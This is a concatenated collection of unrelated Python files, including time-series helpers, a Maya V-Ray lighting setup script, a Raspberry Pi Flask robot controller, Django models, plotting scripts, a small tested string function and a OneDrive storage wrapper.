(datetime(year=2013,month=7,day=16),datetime(year=2013,month=7,day=23)), (datetime(year=2013,month=8,day=15),datetime(year=2013,month=8,day=22)), (datetime(year=2013,month=9,day=14),datetime(year=2013,month=9,day=21)), (datetime(year=2013,month=10,day=18),datetime(year=2013,month=10,day=25)), (datetime(year=2013,month=11,day=20),datetime(year=2013,month=11,day=27)), (datetime(year=2013,month=12,day=22),datetime(year=2013,month=12,day=29))] while True: if first_day.date()>=last_day or (day_max != -1 and first_day.date()>=day_max): break arr = np.array(df.loc[first_day:first_day+pd.Timedelta('1 day')][:-1].fillna(method="bfill").fillna(method="ffill").transpose().values) if np.sum(np.isnan(arr)) >0: arr = np.zeros(shape=arr.shape) for (d1,d2) in empty_weeks: if first_day>=d1 and first_day<d2: arr = np.nan*np.zeros(shape=arr.shape) if len(result) == 0: result = arr else: result = np.append(result, arr, axis=0) first_day+=pd.Timedelta('7 day') return result def create_week_matrix(df, weekday, day_max = -1): ''' Create the matrix where a row corresponds to an entire week, and each column to a time slot ''' #for a monday, we go from tuesday to monday weekday+=1 result=np.array([]) # we start at week 1 of 2011 dates = df.index[48:] first_day = dates[0].weekday() decal = (7-first_day+weekday) first_day = dates[decal*48] last_day = dates[-1].date() empty_weeks = [(datetime(year=2012,month=12,day=28),datetime(year=2013,month=1,day=4)), (datetime(year=2013,month=2,day=2),datetime(year=2013,month=2,day=9)), (datetime(year=2013,month=3,day=6),datetime(year=2013,month=3,day=13)), (datetime(year=2013,month=4,day=10),datetime(year=2013,month=4,day=17)), (datetime(year=2013,month=5,day=13),datetime(year=2013,month=5,day=20)), (datetime(year=2013,month=6,day=12),datetime(year=2013,month=6,day=19)), (datetime(year=2013,month=7,day=16),datetime(year=2013,month=7,day=23)), (datetime(year=2013,month=8,day=15),datetime(year=2013,month=8,day=22)), (datetime(year=2013,month=9,day=14),datetime(year=2013,month=9,day=21)), (datetime(year=2013,month=10,day=18),datetime(year=2013,month=10,day=25)), (datetime(year=2013,month=11,day=20),datetime(year=2013,month=11,day=27)), (datetime(year=2013,month=12,day=22),datetime(year=2013,month=12,day=29))] while True: if (first_day+pd.Timedelta('6 day')).date()>=last_day or (day_max != -1 and (first_day+pd.Timedelta('6 day')).date()>=day_max): break arr = np.array(df.loc[first_day:first_day+pd.Timedelta('7 day')][:-1].transpose().values) if len(result) == 0: result = arr else: result = np.append(result, arr, axis=0) first_day+=pd.Timedelta('7 day') return result # def create_week_matrix_from_slots(df, weekday, hour, min): # ''' # Create the matrix where a row corresponds to an entire week, starting at a precise time slot, and each column to a time slot # ''' # result=np.array([]) # dates = df.index # first_day = dates[0].weekday() # decal = (7-first_day+weekday)%7 # print("Decal: "+str(decal*48+2*hour+int(min/30))) # first_day = dates[decal*48+2*hour+int(min/30)] # last_day = dates[-7*48].date() # print(first_day) # empty_weeks = [(datetime(year=2012,month=12,day=28),datetime(year=2013,month=1,day=4)), # (datetime(year=2013,month=2,day=2),datetime(year=2013,month=2,day=9)), # (datetime(year=2013,month=3,day=6),datetime(year=2013,month=3,day=13)), # (datetime(year=2013,month=4,day=10),datetime(year=2013,month=4,day=17)), # (datetime(year=2013,month=5,day=13),datetime(year=2013,month=5,day=20)), # (datetime(year=2013,month=6,day=12),datetime(year=2013,month=6,day=19)), # (datetime(year=2013,month=7,day=16),datetime(year=2013,month=7,day=23)), # (datetime(year=2013,month=8,day=15),datetime(year=2013,month=8,day=22)), # (datetime(year=2013,month=9,day=14),datetime(year=2013,month=9,day=21)), # (datetime(year=2013,month=10,day=18),datetime(year=2013,month=10,day=25)), # (datetime(year=2013,month=11,day=20),datetime(year=2013,month=11,day=27)), # (datetime(year=2013,month=12,day=22),datetime(year=2013,month=12,day=29))] # # while True: # if (first_day+pd.Timedelta('7 day')).date()>last_day: # break # arr = np.array(df.loc[first_day:first_day+pd.Timedelta('7 day')][:-1].fillna(method="bfill").fillna(method="ffill").transpose().values) # if np.sum(np.isnan(arr)) >0: # arr = np.zeros(shape=arr.shape) # for (d1,d2) in empty_weeks: # if (first_day>=d1 and first_day<d2) or (first_day+pd.Timedelta('7 day')>=d1 and first_day+pd.Timedelta('7 day')<d2): # arr = np.nan*np.zeros(shape=arr.shape) # # if len(result) == 0: # result = arr # else: # result = np.append(result, arr, axis=0) # # first_day+=pd.Timedelta('7 day') # return result
import os, re, sys, logging import maya.cmds as cmds import maya.mel as mel import mVray.vrayObjectProperties as vop import mVray.vrayFrameBuffers as vfb import dloUtils reload(dloUtils) import assetSetup reload(assetSetup) ######## UI Window ######## class bfSetupMessengerUI(): def __init__(self): winTile = "bfSetupMessengerUI" win = dloUtils.dloUIWindow(winTile, "Bigfoot Lighting Setup Messenger", 750, 650, 1) form = cmds.formLayout(p=win, bgc=(.2, .2, .2)) messageScrlList = cmds.textScrollList("bfMessageScrollList", p=form) okBn = cmds.button(p=form, c="cmds.deleteUI('bfSetupMessengerUI')", bgc=(.4, .4, .4), l="Ok", w=80) cmds.formLayout(form, e=1, ac=[(messageScrlList, "bottom", 10, okBn)], af=[(messageScrlList, "top", 10), (messageScrlList, "left", 10), (messageScrlList, "right", 10)]) cmds.formLayout(form, e=1, af=[(okBn, "bottom", 10), (okBn, "left", 10), (okBn, "right", 10)]) dloUtils.dloEvokeUI(winTile, win, 800, 650) ############################ ######## runSetup() ######## ############################ def runSetup(): msgs = [] # Set default render layer as active layer cmds.editRenderLayerGlobals(currentRenderLayer='defaultRenderLayer') # Make sure vray plugin is loaded if cmds.pluginInfo('vrayformaya', q=True, loaded=True) == False: cmds.loadPlugin('vrayformaya', qt=True) # Kick some ass organizeScene(msgs) createUtilShaders(msgs) createRenderElements(msgs) # dlo asset setup assetMsgs = assetSetup.dloAssetSetup() if assetMsgs: msgs.extend(assetMsgs) # Display UI with results if len(msgs): bfSetupMessengerUI() for msg in msgs: cmds.textScrollList("bfMessageScrollList", e=1, a=msg) ######## Utility to determine currently set sequence ######## def getSeq(): return os.getenv("M_SEQUENCE", "") ######## Utility to log progress ######## def logInfo(infoString, accumulatedInfo=[]): print infoString accumulatedInfo.append(infoString) ######## Utility to set up a group and vrayObjectProperties ######## def updateGroupAndVop(searchList, groupName, vopName, msgs): nodes = cmds.ls(searchList, assemblies=True) groupNode = cmds.ls(groupName) vopNode = cmds.ls(vopName) if nodes: if groupNode: cmds.parent(nodes, groupNode) logInfo('Added to group %s: %s' % (groupNode, nodes), msgs) else: groupNode = cmds.group(nodes, name=groupName) logInfo('Created group %s containing %s' % (groupNode, nodes), msgs) if not vopNode: if groupNode: vopNode = vop.createObjectProperties(groupNode, vopName) logInfo('Created vrayObjectProperties %s containing %s' % (vopNode, groupNode), msgs) ######## Organize Outliner and Create Object Properties ######## def organizeScene(msgs=[]): # Trackman trackmanSearchList = ["trackman*:*", "pymSuit*:*"] updateGroupAndVop(trackmanSearchList, 'TRACKMAN_GRP', 'trackman_VOP', msgs) # Tracking Geo trackSearchList = ["*:*__track__*", "pymGuestRoom*:*"] updateGroupAndVop(trackSearchList, 'TRACK_GEO_GRP', 'track_geo_VOP', msgs) # Roots rootSearchList = ["*Heroroots*:*", "*Heroroots*_VRayFurPreviewTm"] updateGroupAndVop(rootSearchList, 'ROOTS_GRP', 'roots_VOP', msgs) # Tunnel tunnelSearchList = ["tunnel*:*", "env_tunnelDressing_*_Instancer_*"] updateGroupAndVop(tunnelSearchList, 'TUNNEL_GRP', 'tunnel_VOP', msgs) # Ants antSearchList = ["carpenterAnt*:*", "char_carpenterAnt*_Instancer_*", "bulletAnt*:*", "char_bulletAnt*_Instancer_*", "crazyAnt*:*", "char_crazyAnt*_Instancer_*", "fireAnt*:*", "char_fireAnt*_Instancer_*",] updateGroupAndVop(antSearchList, 'ANTS_GRP', 'ants_VOP', msgs) # Sugar Cubes sugarcubeSearchList = ["sugarcube*:*", "*sugarcube*_Instancer*"] updateGroupAndVop(sugarcubeSearchList, 'SUGARCUBES_GRP', 'sugarcubes_VOP', msgs) # Antman updateGroupAndVop(["antman*:*"], 'ANTMAN_GRP', 'antman_VOP', msgs) # Wasp updateGroupAndVop(["wasp*:*"], 'WASP_GRP', 'wasp_VOP', msgs) # Yellowjacket updateGroupAndVop(["yellowJacket*:*"], 'YELLOWJACKET_GRP', 'yellowjacket_VOP', msgs) # Missile updateGroupAndVop(["missile*:*"], 'MISSILE_GRP', 'missile_VOP', msgs) ######## Util Shaders Creation ################################## def createUtilShaders(msgs=[]): if not cmds.objExists('RED'): redMtl = cmds.shadingNode('VRayLightMtl', asShader=True, name='RED') cmds.setAttr('%s.color' % (redMtl), 1,0,0, type='double3') cmds.setAttr('%s.emitOnBackSide' % (redMtl), 1) logInfo('Created RED shader', msgs) if not cmds.objExists('GREEN'): greenMtl = cmds.shadingNode('VRayLightMtl', asShader=True, name='GREEN') cmds.setAttr('%s.color' % (greenMtl), 0,1,0, type='double3') cmds.setAttr('%s.emitOnBackSide' % (greenMtl), 1) logInfo('Created GREEN shader', msgs) if not cmds.objExists('BLUE'): blueMtl = cmds.shadingNode('VRayLightMtl', asShader=True, name='BLUE') cmds.setAttr('%s.color' % (blueMtl), 0,0,1, type='double3') cmds.setAttr('%s.emitOnBackSide' % (blueMtl), 1) logInfo('Created BLUE shader', msgs) if not cmds.objExists('BLACK'): blackMtl = cmds.shadingNode('VRayMtl', asShader=True, name='BLACK') cmds.setAttr('%s.color' % (blackMtl), 0,0,0, type='double3') cmds.setAttr('%s.reflectionColorAmount' % (blackMtl), 0) cmds.setAttr('%s.diffuseColorAmount' % (blackMtl), 0) logInfo('Created BLACK shader', msgs) if not cmds.objExists('SHADOW_CATCHER'): shdCatcher = cmds.shadingNode('VRayMtl', asShader=True, name='SHADOW_CATCHER') cmds.setAttr('%s.reflectionColorAmount' % (shdCatcher), 0) cmds.setAttr('%s.diffuseColorAmount' % (shdCatcher), 1) cmds.setAttr('%s.brdfType' % (shdCatcher), 0) logInfo('Created SHADOW_CATCHER shader', msgs) if not cmds.objExists('MIRROR'): mirrorMtl = cmds.shadingNode('VRayMtl', asShader=True, name='MIRROR') cmds.setAttr('%s.color' % (mirrorMtl), 0,0,0, type='double3') cmds.setAttr('%s.reflectionColor' % (mirrorMtl), 1,1,1, type='double3') cmds.setAttr('%s.reflectionColorAmount' % (mirrorMtl), 1) cmds.setAttr('%s.diffuseColorAmount' % (mirrorMtl), 0) cmds.setAttr('%s.useFresnel' % (mirrorMtl), 0) mirrorOccl = cmds.shadingNode('VRayDirt', asTexture=True, name='MIRROR_OCCLUSION') cmds.setAttr('%s.blackColor' % (mirrorOccl), 1,1,1, type='double3') cmds.setAttr('%s.whiteColor' % (mirrorOccl), 0,0,0, type='double3') cmds.setAttr('%s.radius' % (mirrorOccl), 1000) cmds.setAttr('%s.occlusionMode' % (mirrorOccl), 2) cmds.connectAttr('%s.outColor' % (mirrorOccl), '%s.reflectionColor' % (mirrorMtl)) logInfo('Created MIRROR shader', msgs) if not cmds.objExists('CONTACT_SHAD_OCCL'): contactShadOccl = cmds.shadingNode('VRayDirt', asTexture=True, name='CONTACT_SHAD_OCCL') cmds.setAttr('%s.blackColor' % (contactShadOccl), 1,1,1, type='double3') cmds.setAttr('%s.whiteColor' % (contactShadOccl), 0,0,0, type='double3') cmds.setAttr('%s.radius' % (contactShadOccl), 2) cmds.setAttr('%s.ignoreSelfOcclusion' % (contactShadOccl), 1) cmds.setAttr('%s.resultAffectInclusive' % (contactShadOccl), 0) contactShadNonCastSet = cmds.sets(name='contactShadNonCastSet') cmds.connectAttr('%s.usedBy' % (contactShadNonCastSet), '%s.resultAffect' % (contactShadOccl)) logInfo('Created CONTACT_SHAD_OCCL texture', msgs) if (getSeq() != 'bak') and (not cmds.objExists('BG_PROJ')): cmds.file("/jobs/vfx_bf/TASKS/light/maya/renderData/shaders/bf_light_plateProjectionShaders_v0002.mb", i=True) logInfo('Imported BG_PROJ and BLACK_PROJ shaders (if your shot has a plate, connect shot camera to BG_CAMERA_PROJECTION and add plate path to BG_PLATE)', msgs) ################ Render Elements Creation ########################################### def createRenderElements(msgs=[]): if not cmds.objExists('vrayRE_MatteShadow'): vfb.matteShadow('vrayRE_MatteShadow', enabled=False) logInfo('Created vray render element vrayRE_MatteShadow', msgs) if not cmds.objExists('vrayRE_ContactShadow'): if cmds.objExists('CONTACT_SHAD_OCCL'): vfb.extraTex('vrayRE_ContactShadow', 'CONTACT_SHAD_OCCL', explicit_channel='contactShadow', enabled=False) logInfo('Created vray render element vrayRE_ContactShadow', msgs) ######## Ref Spheres Setup ######## def refSphereSetup(): refSphereNode = 'REF_SPHERES_COLORCHART' shotCamNode = 'shotcam1:shot_camera' cmds.editRenderLayerGlobals(currentRenderLayer='defaultRenderLayer') if not cmds.objExists(refSphereNode): cmds.file('/jobs/vfx_bf/TECH/lib/maya/presets/lightRigs/REF_SPHERES_COLORCHART/v0002/lightRig.ma', i=True) if cmds.objExists(shotCamNode): constraintNode = cmds.parentConstraint(shotCamNode, refSphereNode) if constraintNode: constraintNode = constraintNode[0] cmds.setAttr('%s.target[0].targetOffsetTranslate' % (constraintNode), 0, 0, -50) cmds.setAttr('%s.target[0].targetOffsetRotate' % (constraintNode), 0, 180, 0) cmds.delete(constraintNode)
import os import time import datetime from importlib import import_module from flask import Flask, render_template, Response, request import psutil # sudo pip3 install psutil import RPi.GPIO as GPIO # GPIO.getmode() GPIO.setmode(GPIO.BOARD) right = 37 left = 35 back = 38 GPIO.setup(left, GPIO.OUT) GPIO.setup(right, GPIO.OUT) GPIO.setup(back, GPIO.OUT) GPIO.output(left, GPIO.LOW) GPIO.output(right, GPIO.LOW) GPIO.output(back, GPIO.LOW) # import camera driver if os.environ.get('CAMERA'): Camera = import_module('camera_' + os.environ['CAMERA']).Camera else: from camera import Camera # Raspberry Pi camera module (requires picamera package) # from camera_pi import Camera def measure_temp(): temp = os.popen("vcgencmd measure_temp").readline() return (temp.replace("temp=", "")) def get_cpu_usage(): # return str(os.popen("top -n1 | awk '/Cpu\(s\):/ {print $2}'").readline().strip(\)) cpu_usage = psutil.cpu_percent() return (str(cpu_usage)) # return ("2") app = Flask(__name__) @app.route("/") def index(): now = datetime.datetime.now() dateStr = now.strftime("%Y-%m-%d") timeStr = now.strftime("%H:%M:%S") templateData = { "title": "RPi Infos", "date": dateStr, "timeJS": timeStr} return render_template('t_index.html', **templateData) @app.route("/temp") def temp(): data = ["Temperature", "RPi temperature: ", measure_temp()] return render_template('t_temp.html', data=data) @app.route("/cpu") def cpu(): data = ["CPU Page", "CPU usage: ", get_cpu_usage()] return render_template('t_cpu.html', data=data) @app.route('/stream') def stream(): """Video streaming home page.""" #for pin in pins: # pins[pin]['state'] = GPIO.input(pin) # Put the pin dictionary into the template data dictionary: #templateData = { # 'pins' : pins} #return render_template('stream2.html',**templateData) return render_template('stream2.html') def gen(camera): """Video streaming generator function.""" while True: frame = camera.get_frame() yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n') @app.route('/stream/video_feed') def video_feed(): """Video streaming route. Put this in the src attribute of an img tag.""" return Response(gen(Camera()), mimetype='multipart/x-mixed-replace; boundary=frame') #@app.route('/setGPIO', methods=['POST','GET']) @app.route('/setGPIO/<what>', methods=['POST']) def setGPIO(what): if what == 'forwardstart': GPIO.output(left,GPIO.HIGH) GPIO.output(right,GPIO.HIGH) "" elif what == 'forwardstop': GPIO.output(left,GPIO.LOW) GPIO.output(right,GPIO.LOW) GPIO.output(back,GPIO.LOW) "" elif what == 'left': GPIO.output(left,GPIO.HIGH) GPIO.output(right,GPIO.LOW) "" elif what == 'right': GPIO.output(left,GPIO.LOW) GPIO.output(right,GPIO.HIGH) "" elif what == 'back': GPIO.output(back,GPIO.HIGH) #GPIO.output(left,GPIO.LOW) #GPIO.output(right,GPIO.HIGH) "" else: GPIO.output(left,GPIO.LOW) GPIO.output(right,GPIO.LOW) GPIO.output(back,GPIO.LOW) "" if (GPIO.input(left) == 0): answer = "GPIO13 is OFF" else: answer = "GPIO13 is ON" return answer @app.route('/checkGPIO', methods=['GET']) def checkGPIO(): if (GPIO.input(left) == 0): answer = "GPIO13 is OFF" else: answer = "GPIO13 is ON" return answer #return "Hello" if __name__ == "__main__": app.run(host='0.0.0.0',debug=True,threaded=True)
from django.urls import path from . import views urlpatterns = [ path('blog/', views.ListPost.as_view()), path('blog/<int:pk>/', views.DetailPost.as_view()), path('upload/', views.FileView.as_view(), name='file-upload'), path('comment/', views.CommentView.as_view()), path('blog_comment/', views.ListComment.as_view()), path('photos/', views.ListFile.as_view()), path('photos/<int:pk>/', views.DetailFile.as_view()), path('tags/', views.ListTags.as_view()), ]
#!/usr/bin/env python import matplotlib.pyplot as plt #Statisitcs for Saquon Barkley's 2018 Fantasy Scoring fig = plt.figure() fig.suptitle('2018 Fantasy Points per Game for Saquon Barkley', fontsize=18) plt.xlabel('Game', fontsize=14) plt.ylabel('Points', fontsize=14) plt.plot([1,2,3,4,5,6,7,8,9,10,11], [20.8,24.8,22.7,22,28.9,37.9,26.4,20.1,0,14,35.2], 'bD') plt.axis([0, 12, 0, 40]) plt.show() # DB: Good!
from django.contrib.contenttypes.fields import GenericForeignKey from django.contrib.contenttypes.models import ContentType from django.db import models from users.models import User import uuid class Transaction(models.Model): id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False) user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='transactions') from_type = models.ForeignKey(ContentType, on_delete=models.CASCADE, related_name='from_transactions') from_id = models.UUIDField() from_object = GenericForeignKey('from_type', 'from_id') from_amount = models.FloatField(blank=False, null=False) to_type = models.ForeignKey(ContentType, on_delete=models.CASCADE, related_name='to_transactions') to_id = models.UUIDField() to_object = GenericForeignKey('to_type', 'to_id') created_at = models.DateTimeField(auto_now_add=True, editable=False, null=False, blank=False) updated_at = models.DateTimeField(auto_now=True, editable=False, null=False, blank=False) class Wallet(models.Model): id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False) name = models.CharField(max_length=100, default='Default wallet') user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='wallets') class Asset(models.Model): id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False) wallet = models.ForeignKey(Wallet, on_delete=models.CASCADE, related_name='assets') asset_type = models.ForeignKey(ContentType, on_delete=models.CASCADE) asset_id = models.UUIDField() asset_object = GenericForeignKey('asset_type', 'asset_id') asset_amount = models.FloatField(blank=False, null=False)
"""Find the longest word in a given string.""" import unittest def longest_word(sen: str) -> str: """ Find the longest word in a space separated string. :param sen: A space separated string of words. This can also include punctuation, but punctuation will be ignored. :return: The longest string in sen(punctuation will be ignored). If two strings are the same length, the first will be returned. """ longest_word = 0 longest_index = None split_words = sen.split() for index, word in enumerate(split_words): alphas = [] for char in word: if char.isalpha() or char.isnumeric(): alphas.append(char) if len(alphas) > longest_word: longest_word, longest_index = len(alphas), index return split_words[longest_index] class LongestWordTest(unittest.TestCase): """Testing for longest word function.""" def test_it_knows_the_longest_word(self): """Return the longest word excluding punctuation.""" self.assertEqual(longest_word('I love dogs'), 'love') self.assertEqual(longest_word('I love #dogs!!!!'), 'love') self.assertEqual(longest_word('123456789 98765432'), '123456789') if __name__ == '__main__': unittest.main()
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon Oct 21 19:15:01 2019 @author: nico """ import sys sys.path.append('/home/nico/Documentos/facultad/6to_nivel/pds/git/pdstestbench') import os import matplotlib.pyplot as plt import numpy as np import scipy.signal as sg from pdsmodulos.signals import FFT from pdsmodulos.signals import windows as wds #import seaborn as sns os.system ("clear") # limpia la terminal de python plt.close("all") #cierra todos los graficos N = 1000 # muestras fs = 1000 # Hz df = fs / N a0 = 2 # Volts p0 = 0 # radianes f0 = fs / 4 M = 9*N ventanas = [np.bartlett(N), wds.triang(N), np.hanning(N), wds.hann(N), np.blackman(N), wds.blackamanHarris(N), sg.flattop(N), wds.flattop(N), sg.boxcar(N), sg.boxcar(N)] V = len(ventanas) ventana = ["Bartell", "my_Triang", "Hanning", "my_Hanning", "Blackman", "my_Blackman", "Flattop", "my_Flattop", "Rectangular", "my_Rectangular"] aux_padding = np.zeros(M, float) # creo las ventanas y obtengo el móduo de su dft signal = np.vstack(np.transpose([this_w for this_w in ventanas])) mod_signal = np.vstack(np.transpose([np.abs(np.fft.fft(signal[:,ii]))*2/N for ii in range(V)])) # creo las ventanas con zero padding y obtengo el móduo de su dft signal_padding = np.vstack(np.transpose([np.concatenate((this_w,aux_padding), axis=0) for this_w in ventanas])) mod_signal_padding = np.vstack(np.transpose([np.abs(np.fft.fft(signal_padding[:,ii]))*2/(N + M) for ii in range(V)])) # la paso en dB mod_signal = 20 *np.log10(mod_signal/mod_signal[0]) mod_signal_padding = 20 *np.log10(mod_signal_padding/mod_signal_padding[0]) #Genero los ejes de tiempo y frecuencia tt = np.linspace(0, (N-1)/fs, N) freq = np.linspace(0, (N-1)*df, N) / fs freq2 = np.linspace(0, (N + M-1)*df, N + M) / (10*fs) for ii in (0,2,4,6,8): #grafico de las ventanas fig = plt.figure("ventana " + ventana[ii], constrained_layout=True) gs = fig.add_gridspec(2, 3) #grafico de la ventana de python f_ax1 = fig.add_subplot(gs[0, 0]) f_ax1.set_title(ventana[ii]) f_ax1.plot(tt,ventanas[ii]) f_ax1.set_xlabel("tiempo [S]") f_ax1.set_ylabel("Amplitud") f_ax1.axhline(0, color="black") f_ax1.axvline(0, color="black") f_ax1.grid() #grafico del modulo la ventana de python f_ax2 = fig.add_subplot(gs[0, 1]) f_ax2.set_title("FFT " + ventana[ii]) f_ax2.plot(freq[0:int(N/2)], mod_signal[0:int(N/2),ii], marker='.', linestyle='None') f_ax2.set_xlabel('frecuecnia normalizada f/fs [Hz]') f_ax2.set_ylabel("Magnitud [dB]") f_ax2.axhline(0, color="black") f_ax2.axvline(0, color="black") f_ax2.grid() #grafico del modulo la ventana con zero padding de python f_ax3 = fig.add_subplot(gs[0, 2]) f_ax3.set_title("Zero padding " + ventana[ii]) f_ax3.plot(freq2[0:int((N+M)/2)], mod_signal_padding[0:int((N + M)/2),ii], marker='.', linestyle='None') f_ax3.set_xlabel('frecuecnia normalizada f/fs [Hz]') f_ax3.set_ylabel("Magnitud [dB]") f_ax3.axhline(0, color="black") f_ax3.axvline(0, color="black") f_ax3.set_xlim(0, 0.015) f_ax3.set_ylim(-150, 0) f_ax3.grid() #grafico de la ventana propia f_ax4 = fig.add_subplot(gs[1, 0]) f_ax4.set_title(ventana[ii + 1]) f_ax4.plot(tt,ventanas[ii + 1]) f_ax4.set_xlabel("tiempo [S]") f_ax4.set_ylabel("Amplitud") f_ax4.axhline(0, color="black") f_ax4.axvline(0, color="black") f_ax4.grid() #grafico del modulo la ventana propia f_ax5 = fig.add_subplot(gs[1, 1]) f_ax5.set_title("FFT " + ventana[ii + 1]) f_ax5.plot(freq[0:int(N/2)], mod_signal[0:int(N/2),ii + 1], marker='.', linestyle='None') f_ax5.set_xlabel('frecuecnia normalizada f/fs [Hz]') f_ax5.set_ylabel("Magnitud [dB]") f_ax5.axhline(0, color="black") f_ax5.axvline(0, color="black") f_ax5.grid() #grafico del modulo la ventana con zero padding propia f_ax6 = fig.add_subplot(gs[1, 2]) f_ax6.set_title("Zero padding " + ventana[ii + 1]) f_ax6.plot(freq2[0:int((N+M)/2)], mod_signal_padding[0:int((N + M)/2),ii + 1], marker='.', linestyle='None') f_ax6.set_xlabel('frecuecnia normalizada f/fs [Hz]') f_ax6.set_ylabel("Magnitud [dB]") f_ax6.axhline(0, color="black") f_ax6.axvline(0, color="black") f_ax6.set_xlim(0, 0.015) f_ax6.set_ylim(-150, 0) f_ax6.grid() fig2 = plt.figure("Comparación de los módulos de las ventanas") plt.plot(freq2[0:int((N + M)/2)], mod_signal_padding[0:int((N + M)/2),0], marker='.', linestyle='None', label=ventana[0]) plt.plot(freq2[0:int((N + M)/2)], mod_signal_padding[0:int((N + M)/2),2], marker='.', linestyle='None', label=ventana[2]) plt.plot(freq2[0:int((N + M)/2)], mod_signal_padding[0:int((N + M)/2),4], marker='.', linestyle='None', label=ventana[4]) plt.plot(freq2[0:int((N + M)/2)], mod_signal_padding[0:int((N + M)/2),6], marker='.', linestyle='None', label=ventana[6]) plt.plot(freq2[0:int((N + M)/2)], mod_signal_padding[0:int((N + M)/2),8], marker='.', linestyle='None', label=ventana[8]) plt.xlabel('frecuecnia normalizada f/fs [Hz]') plt.ylabel("Magnitud [dB]") plt.axhline(0, color="black") plt.axvline(0, color="black") plt.xlim(0, 0.01) plt.ylim(-150, 0) plt.grid() plt.legend(loc ='upper right')
from datetime import datetime, timedelta def getStartOfAttemptCycleDate(): return getStartOfAttemptCycle().date(); def getStartOfAttemptCycle(): pub_date = datetime.today() min_pub_date_time = datetime.combine(pub_date, datetime.min.time()) min_pub_date_time -= timedelta(hours=5) # UTC minus 5 is central return min_pub_date_time def getEndOfAttemptCycleDate(): return getEndOfAttemptCycle.date() def getEndOfAttemptCycle(): pub_date = datetime.today() max_pub_date_time = datetime.combine(pub_date, datetime.max.time()) max_pub_date_time -= timedelta(hours=5) # UTC minus 5 is central return max_pub_date_time # from goals.time import getStartOfAttemptCycle # from goals.time import getEndOfAttemptCycle
#! /usr/bin/env python # coding=utf8 import logging import os import sys import uuid import pyproxy.safestore.handler.defines as defines import pyproxy.safestore.db.db_provider as dbprovider from onedrive import api_v5 from onedrive.api_v5 import DoesNotExists, ProtocolError from httplib import BadStatusLine, ResponseNotReady from ssl import SSLError import requests import ConfigParser config = ConfigParser.ConfigParser() HERE = os.path.abspath(os.path.dirname(__file__)) config.read(os.path.join(HERE, '../configuration/ACCOUNTS.INI')) CLIENT_ID = config.get('ONEDRIVE','CLIENT_ID') CLIENT_SECRET = config.get('ONEDRIVE','CLIENT_SECRET') REDIRECT_URI = config.get('ONEDRIVE', 'REDIRECT_URI') AUTHORIZE_URI = config.get('ONEDRIVE','AUTHORIZE_URI') TOKEN_URI = config.get('ONEDRIVE','TOKEN_URI') CODE_URI = config.get('ONEDRIVE','CODE_URI') class ODrive(): def __init__(self): self.logger = logging.getLogger('onedrive') self.db = dbprovider.DB() self.api_client = None self.api = self.setup_api() self.logger.info("Access token: "+ str(self.access_token)) def setup_api(self): """ Initiates the onedrive API client. Returns: A configured api client """ api = api_v5.OneDriveAPI() api.client_id = CLIENT_ID api.client_secret = CLIENT_SECRET api.auth_url_user = AUTHORIZE_URI api.auth_redirect_uri = REDIRECT_URI api.auth_scope = (api.auth_scope[0], api.auth_scope[1], api.auth_scope[2], 'wl.emails') self.access_token = self.db.get_provider_token('onedrive') self.refresh_token = self.db.get_provider_refresh_token('onedrive') if self.access_token is None: authorize_url = api.auth_user_get_url() sys.stdout.write("1. Go to: " + authorize_url + "\n") sys.stdout.write("2. Click \"Allow\" (you might have to log in first).\n") sys.stdout.write("3. Copy the redirect url.\n") url = raw_input("Enter the authorization url here: ").strip() print api.auth_user_process_url(url) print api.auth_get_token() self.db.set_provider_token('onedrive', api.auth_access_token, api.auth_refresh_token) else: api.auth_access_token = self.access_token api.auth_refresh_token = self.refresh_token return api def createDir(self,path): paths=path.split("/") parent_id='me/skydrive' if len(paths)>3: cut=path[0:-1].rfind('/') parent_id=self.api.resolve_path(path[:cut+1]) self.api.mkdir(paths[-2],folder_id=parent_id) def listChildren(self,path): try: url=self.api.resolve_path(path) return [x['name'] for x in self.api.listdir(folder_id=url)] except DoesNotExists: self.logger.exception("listChildren error") return [] def put(self, data, path): self.logger.debug("Put path:"+path) tmpfile_path=defines.TEMP_PATH + 'tmpfile-one' + str(uuid.uuid4()) cut=path.rfind('/') path=path[cut+1:] api = self.setup_api() try: myfile = defines.temp_file_open(tmpfile_path) myfile.seek(0) myfile.write(data) myfile.seek(0) parent_id=api.resolve_path(path[:cut+1]) api.put((path,myfile),folder_id=parent_id) except (ProtocolError,SSLError,BadStatusLine,ResponseNotReady) as e: #Try again print e self.put(data,path) finally: defines.temp_file_close(myfile) defines.temp_file_delete(tmpfile_path) def get(self, path): self.logger.debug("Get path:" + path) try: api = self.setup_api() url = api.resolve_path(path) contents = api.get(url) return contents except DoesNotExists: return None except (ProtocolError, SSLError, BadStatusLine, ResponseNotReady): #Try again return self.get(path) def clean(self,path): self.logger.debug("Clean path:"+path) try: url=self.api.resolve_path(path) files=self.api.listdir(folder_id=url) for mfile in files: link=mfile['id'] self.api.delete(link) if path!='/': self.api.delete(url) except DoesNotExists: return None except (ProtocolError,SSLError,BadStatusLine,ResponseNotReady),e: #Try again print "Error"+str(e) self.clean(path) def clear(self): self.clean("/") def delete(self,path): self.logger.debug("Delete path:"+path) try: url=self.api.resolve_path(path) self.api.delete(url) except DoesNotExists: return None except (ProtocolError,SSLError,BadStatusLine,ResponseNotReady): #Try again self.delete(path) def quota(self): """Returns the current free space in bytes in the Drive """ try: return self.api.get_quota()[0] except (ProtocolError,SSLError,BadStatusLine,ResponseNotReady): #Try again return self.quota() def getUserEmail(self): return requests.get("https://apis.live.net/v5.0/me?access_token="+self.api.auth_access_token).json()['emails']['account'] def getUserName(self): return requests.get("https://apis.live.net/v5.0/me?access_token="+self.api.auth_access_token).json()['name']
